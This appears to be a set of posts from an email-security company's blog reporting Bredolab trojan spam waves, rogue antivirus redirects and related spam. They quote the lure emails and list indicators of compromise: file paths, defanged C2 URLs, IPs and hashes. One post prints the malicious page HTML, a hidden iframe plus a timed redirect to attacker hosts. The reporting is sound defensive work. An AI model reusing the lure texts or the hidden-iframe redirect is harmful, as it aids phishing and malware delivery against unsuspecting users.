New Bredolab trojan in the wild


MX Lab intercepted a new Bredolab trojan attached to emails with changing subjects and body content.

The following email subjects are being used:

Beauty and the Geek 2
First Birthday Invitation
fill this Passport form
In USA on August 15 and 16
Resume & Coverletter - Feedback
Status
Your reservation is confirmed - Ref: 12801/267373

The email body also changes with every new email version. Here are some examples:

Hi Joe,

I will be in USA on August 15, 16 and 17. I have a job interview on August 15 and available on August 16. I wonder if you and your partners will be available to catch up on any job prospect at your company.

I have attached my resume again with few changes.

Please let me know your availability. Thank you.

Best Regards,
Salvatore

Hello,

Thank you for making a booking through Allhotels

This voucher confirms that you have paid $ 1,100.00 as a deposit for the cost of the rooms and services detailed below. The guest must present this voucher, along with photo identification matching the guest name on this voucher, to the hotel on check-in.

The hotel will also ask for a valid credit card on check-in. This is to cover incidental expenses like meals, drinks, laundry, etc. Guests are responsible for payment of all extra charges direct to the hotel.

Please find the details in the attachment.

Hello All,

Please treat this as my personal invitation , Grace the occasion with your presence and bless my elder brother’s daughter on her first birthday.

Date: Sunday, August 15

Please find the venue details in the attachment.

Thanks,
Jordan Fish

Along with the subject and body content changes, the attached ZIP file also has different file names:

Resume.zip
invitation.zip

The attached ZIP archive is around 120 kB large, once extracted an .exe file is unpacked with the same name as the ZIP archive.

The trojan is known as Gen:Variant.Bredo.6 (Bitdefender), W32/Zbot.AN.test!Eldorado (F-Prot), W32/Trojan3.BXW (Authentium).

The following files will be created:

%Windir%\host32.exe
%Windir%\jh87uhnoe3\ewf32.nls
%Windir%\jh87uhnoe3\ewfrvbb.nls

The following directory will be created:

%Windir%\jh87uhnoe3

Several Windows registry modification are executed to the infected system.

At the time of writing, only 6 of the 42 AV engines at Virus Total did detect the treath. Virus Total permlink and MD5: 4150a1deee2bb6852095627df34defb3.

MX Lab group on LinkedIn


“Join the corporate group of MX Lab, provider of email security services like zero hour anti virus, managed anti spam and email archiving solutions. This group is open to everyone who is involved or interested in email security.”

Join the MX Lab group on LinkedIn.

Campaign with emails that lead to rogue AV software antivirus_24.exe continues


MX Lab reported yesterday of emails where famous brands are used to lead users to a web site that hosts a malicious file antivurs_24.exe.

Today, MX Lab intercepted even more of those emails leading to a web site hxxp://clinique-fuer-schoene-haut.de/x.html. This site has the following malicious code:

PLEASE WAITING 4 SECOND...
  <meta http-equiv="refresh" content="4;url=hxxp://hoopdotami.cz.cc/scanner5/?afid=24">
</head><body>
<iframe src="hxxp://baymediagroup.com:8080/index.php?pid=10"
style="visibility: hidden;" height="1" width="1"></iframe>
</body></html>

After 4 second syou will get redirected to hxxp://hoopdotami.cz.cc/scanner5/?afid=24.

The brands we intercepted are Ikea, Macys, Snapfish, Zappos, SurveySpot, XM, Focus Point Global and Very Best Baking. Here are some screens of the emails.

More information regarding the treath can be found in the blog post Malicious emails lead to rogue AV software antivirus_24.exe.

Malicious emails lead to rogue AV software antivirus_24.exe


MX Lab intercepted emails that leads to the rogue anti virus software with the executable antivurs_24.exe. The senders make use of well known brand names like Macy’s, Costco Photo Center and perhaps also other brands as well.

The URLs inside the message lead to a web site that hosts a malicious script and will offer you the option to download antivirus_24.exe later on.

When following this URL on our Mac we got the message “PLEASE WAITING 4 SECOND…”.

The web site has the following HTML code:

PLEASE WAITING 4 SECOND...
  <meta http-equiv="refresh" content="4;
url=hxxp://hoopdotami.cz.cc/scanner5/?afid=24">
</head><body>
<iframe src="hxxp://baymediagroup.com:8080/index.php?pid=10"
style="visibility: hidden;" height="1" width="1"></iframe>
</body></html>

We got the following screen below but I'm sure that on Windows it will be slightly different. Some Windows icons will be included of your hard drives and so on.

You will get to see some errors, your system is infected and the instructions lead you to download the malware. This part is obviously fake so please do not continue the process.

Virus Total permlink and MD5: 5be4b708a68687cb5490fe2caea49c82

New Bredolab trojan variant present in emails from Apple Store Fifth Avenue, NYCEDC Employment Application and more


MX Lab intercepts new Bredolab trojan variants in several email formats ranging from a receipt of the Apple Store on Fifth Avenue to the NYCEDC Employment Application and even more.

Please note that the from address is spoofed in all cases, the subject, the body of the email and filename my change. We also do not list every new email format where this trojan is present in so it is possible that new email formats emerge as you read this.

Your receipt from Apple Store, Fifth Avenue

The first example contains the subject “Your receipt from Apple Store, Fifth Avenue”, is from a spoofed address and has the following very short email body:

Thank you for shopping at the Apple Store.

The email has the attachment emailreceipt_20100116R0951092283.zip.

NYCEDC Employment Application

This email has the subject “NYCEDC Employment Application” and has the following email body:

Hello,

It was nice talking with you yesterday. Attached is the NYCEDC Employment Application. It’s an interactive PDF form so you should be able to type directly into it. If you could bring a completed copy with you to the interview, that would be great. Please let me know if you have any questions.

Best,
Best,
Courtney Sewell

The email has the attachment file_13671.zip.

Final_moments_of_Air_France

This email has the subject “Final_moments_of_Air_France” and has the following email body:

HI

Please have a look at these photos from Air france crash.

Avnish

34962879433

Antony

The email has the attachment Final_moments_of_Air_France_-_Incredible_Photos.zip.

0462

This email has the subject “0462″ and the following body of the email:

Hi

I hope that this message finds you well. What do you think of the attached role?

Thanks!

Chadwick

The email has the attachment Code 9664 - for email.zip.

Your Quote from AA Getaway Coaches

This email has the subject “Your Quote from AA Getaway Coaches” and has the following body:

Hello
Thank you for choosing AA Getaway Coaches. Your Quote is attached. If you decide to travel with us, please sign and fax back to our offices the Reservation Request Form as soon as possible to reserve your vehicles.
Thank You,
Jane Burkett

Pay Online with PayPal. Fax your signed Reservation Request From back to our offices at 718.982.5274, we will reserve your vehicles and send you an email containing instructions to make your payment online using PayPal - safely and securely.

The attached documents are in PDF format and require a compatible PDF viewer such as Adobe Reader.

The email has the attachment reservationRequestForm0000043643.zip.

Proposal

This email has the subject “Proposal” and the following body:

Hi ,

It was a pleasure to meet you last night, and thank you ! As per our conversation, please find attached a preliminary proposal, including various prix fixe menus and a credit card authorization form. Also attached is our current wine list, in case you would like to pre-select any wine for this event. Please let me know if you have any questions, as it would be my pleasure to assist you.

Thanks and best,
Cynthia

-

Shauna Fritz
Event Coordinator
Benjamin Steakhouse
52 E 41st Street
New York, NY 10017
T: 212-297-9177
F: 212-297-9146
[email protected]

This email has the attachment CURRENT_WINE_LIST_04-02-10(c)_(2)1.zip.

Resume

This email has the subject “Resume” and the following body:

I cleaned up the formatting of the resume and will review the content at some point today. Save this as your latest version and I’ll talk to you later.

:)

Thanks

This email has the attachment Marcelino Estrada Resume.zip.

acceptance letter & benefit summary

This email has the subject “acceptance letter & benefit summary” and the following body:

Hi

As discussed, attached is a copy of your acceptance letter and a copy of the ASPCA benefit summary for review. We will have the original acceptance letter here for you in the morning. Please ask for me at the front reception desk at around 9:15 a.m.

We are so excited to have you joining the HR team and the ‘A’

See you tomorrow!

This email has the attachment Summary of Benefits - New York.zip.

Analysis of the treath:

The trojan is known as W32/Bredolab.GE (Authentium), Trojan.Bredolab-987 (Clam AV), W32/Bredolab.B!genr (Norman), Troj/Bredo-DV (Sophos).

The trojan will create the following files:

%AppData%\16887.exe
%Programs%\Security Tool.lnk
%Windir%\Temp\_ex-08.exe

The following processes are created:

Process Name: 16887.exe
Process Filename: %AppData%\16887.exe

Process Name: _ex-08.exe
Process Filename: %Windir%\temp\_ex-08.exe

Several Windows registry modifications will be performed on the system and the trojan can establish a connection to the IPs 194.28.112.3 and 77.78.249.2 on port 80.

The trojan will download data from the remote web host at hxxp://77.78.249.2/cb_soft.php?q=7a76b969b50d772dfcffc81e3205c1d9

Virus Total permlink and MD5: e59e39cff3bc611d3bd50287c94deb66.

Yahoo Groups being abused by spammers


Great names are quite often the subject of abuses and this time, the Yahoo Groups are being used in spam messages. Spammers have created a large amount of account on the Yahoo Groups and are including URLs in their spam messages.

The messages comes with the subject line in the form of: ****@***.be VIAGRA ® Official Site -77%. The body of the email only contains an URL to for example hxxp://groups.yahoo.com/group/*****/message.

This is an example of such a web site.

The image that promotes Viagra also contains an URL that leads to, in our case, hxxp://superdrugsudden.com:8080/. And yes, it’s the Canadian Pharmacy again. We have to admit that they are very active on the internet.

Messages with the YouSendIt Reader contains the Bredolab trojan


After our first report earlier today of the YouSendIt abuse that leads to a malicious payload and spam web site, MX Lab now intercepted messages with the subject “You have received a file from [email protected] via YouSendIt.” and the attachment YouSendIt_reader.zip.

The email address is spoofed and the email address in the subject line will change according to the from address.

The body of the email:

Maryellen Meier has sent you the following via YouSendIt

File attached to this letter.

YouSendIt, Inc. | Privacy Policy

1919 S. Bascom Ave., Campbell, CA 95008

The message has the attachment YouSendIt_reader.zip. Once extracted, the 20 kB large file YouSendIt_reader.exe is available.

The trojan is known as Gen:Variant.Bredo.2 (BitDefender, F-Secure, GData), TrojanDownloader:Win32/Waledac.C (Microsoft).

The following files are created:

%AppData%\1410506.exe
%Programs%\Security Tool.lnk
%Windir%\Temp\_ex-08.exe

New processes are created:

Process Name: 1410506.exe
Process Filename: %AppData%\1410506.exe

Process Name: _ex-08.exe
Process Filename: %Windir%\temp\_ex-08.exe

Process Name: 1410506.exe
Process Filename: %UserProfile%\LOCALS~1\APPLIC~1\1410506.exe

Several Windows registry modificatiosn are being made to the infected system and the trojan can establish an connection to the IPs 77.78.249.2 and 85.234.191.111 on port 80.

The trojan will also connect to the URL hxxp://77.78.249.2/cb_soft.php?q=a4867e4e00d394bf25ae3835341f22e3

At the time of writing, only 8 of the 42 AV engines at Virus Total did detect the treath.Virus Total permlink and MD5: 79be5ebc9659f2c4e2e85cdd3464720d.

Follow

Get every new post delivered to your Inbox.

Join 346 other followers